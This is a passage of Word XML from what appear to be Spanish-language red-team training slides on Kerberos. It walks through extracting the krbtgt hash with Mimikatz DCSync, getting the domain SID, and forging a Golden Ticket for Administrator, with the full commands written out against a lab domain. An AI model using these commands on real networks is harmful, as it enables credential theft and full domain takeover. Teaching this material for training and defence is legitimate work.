                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>6. Respuesta TGS (recibir TGS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53003749" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="7"/>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4064" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F4D1714" wp14:editId="0B7B40D9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4908803</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>127201</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2880360" cy="646430"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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646430"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4AF78E6F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="405" w:firstLine="148"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>7. Los clientes que utilizan el TGS asignado están autenticados y autorizados para</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="16201816" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="290" w:lineRule="exact"/>
                              <w:ind w:left="1444"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>acceder al servidor de base de datos</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3F4D1714" id="Textbox 555" o:spid="_x0000_s1285" type="#_x0000_t202" style="position:absolute;margin-left:386.5pt;margin-top:10pt;width:226.8pt;height:50.9pt;z-index:-1561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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4AF78E6F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="405" w:firstLine="148"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>7. Los clientes que utilizan el TGS asignado están autenticados y autorizados para</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="16201816" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="290" w:lineRule="exact"/>
                        <w:ind w:left="1444"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>acceder al servidor de base de datos</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A55C8BB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58028646" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73E60B2F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B480F85" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76884E7C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6637DDD6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="229"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08463F13" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="17735"/>
        </w:tabs>
        <w:spacing w:before="1"/>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159</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EE77B3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId285"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="20" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C72BF8F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1041"/>
        </w:tabs>
        <w:spacing w:before="57"/>
        <w:ind w:left="1041" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Extraiga</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>el</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash de la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>cuenta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B86E5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15E2F701" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="26"/>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6112" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12736B80" wp14:editId="70EFB67C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1958339</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>192119</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7961630" cy="368935"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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1630" cy="368935"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="497C7F36" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="84"/>
                              <w:ind w:left="136"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>invoke-mimikatz -command '"lsadump::d csync /user:cyberwarfare\krbtgt"'</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="12736B80" id="Textbox 558" o:spid="_x0000_s1286" type="#_x0000_t202" style="position:absolute;margin-left:154.2pt;margin-top:15.15pt;width:626.9pt;height:29.05pt;z-index:-15610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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="497C7F36" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="84"/>
                        <w:ind w:left="136"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>invoke-mimikatz -command '"lsadump::d csync /user:cyberwarfare\krbtgt"'</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2AA5EC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="622C304A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="91"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="544573C1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1041"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1041" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>SID de dominio :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07768A09" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699A235B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="15"/>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6624" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="37389A99" wp14:editId="118FBAA0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4658867</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>185249</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3459479" cy="525780"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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9479" cy="525780"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6DB47F23" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64"/>
                              <w:ind w:left="304"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>whoami</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> /all (de un </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>usuario</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> de </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>dominio</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="37389A99" id="Textbox 559" o:spid="_x0000_s1287" type="#_x0000_t202" style="position:absolute;margin-left:366.85pt;margin-top:14.6pt;width:272.4pt;height:41.4pt;z-index:-1560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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6DB47F23" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64"/>
                        <w:ind w:left="304"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>whoami</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> /all (de un </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>usuario</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> de </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>dominio</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="594B3AB7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="235"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36186475" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1041"/>
        </w:tabs>
        <w:ind w:left="1041" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Boleto de oro de Adversary Forge en un dominio de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D2BE82" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE3718C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2387C60D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AC5B16C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="7"/>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707136" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51F733D6" wp14:editId="138C7CED">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>568451</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>179794</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="11055350" cy="1283335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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0" cy="1283335"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="46F03AA0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="256" w:line="376" w:lineRule="auto"/>
                              <w:ind w:left="63" w:right="306"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>Invoke-mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5- 21-xxxxx-yyyyy-xxxxx /krbtgt:xxxxxxxxxxxxxxxxxx /startoffset:0 /endin:600 /renewmax:10080 /ptt"'</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="51F733D6" id="Textbox 560" o:spid="_x0000_s1288" type="#_x0000_t202" style="position:absolute;margin-left:44.75pt;margin-top:14.15pt;width:870.5pt;height:101.05pt;z-index:-1560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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="46F03AA0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="256" w:line="376" w:lineRule="auto"/>
                        <w:ind w:left="63" w:right="306"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>Invoke-mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-5- 21-xxxxx-yyyyy-xxxxx /krbtgt:xxxxxxxxxxxxxxxxxx /startoffset:0 /endin:600 /renewmax:10080 /ptt"'</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3447C2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
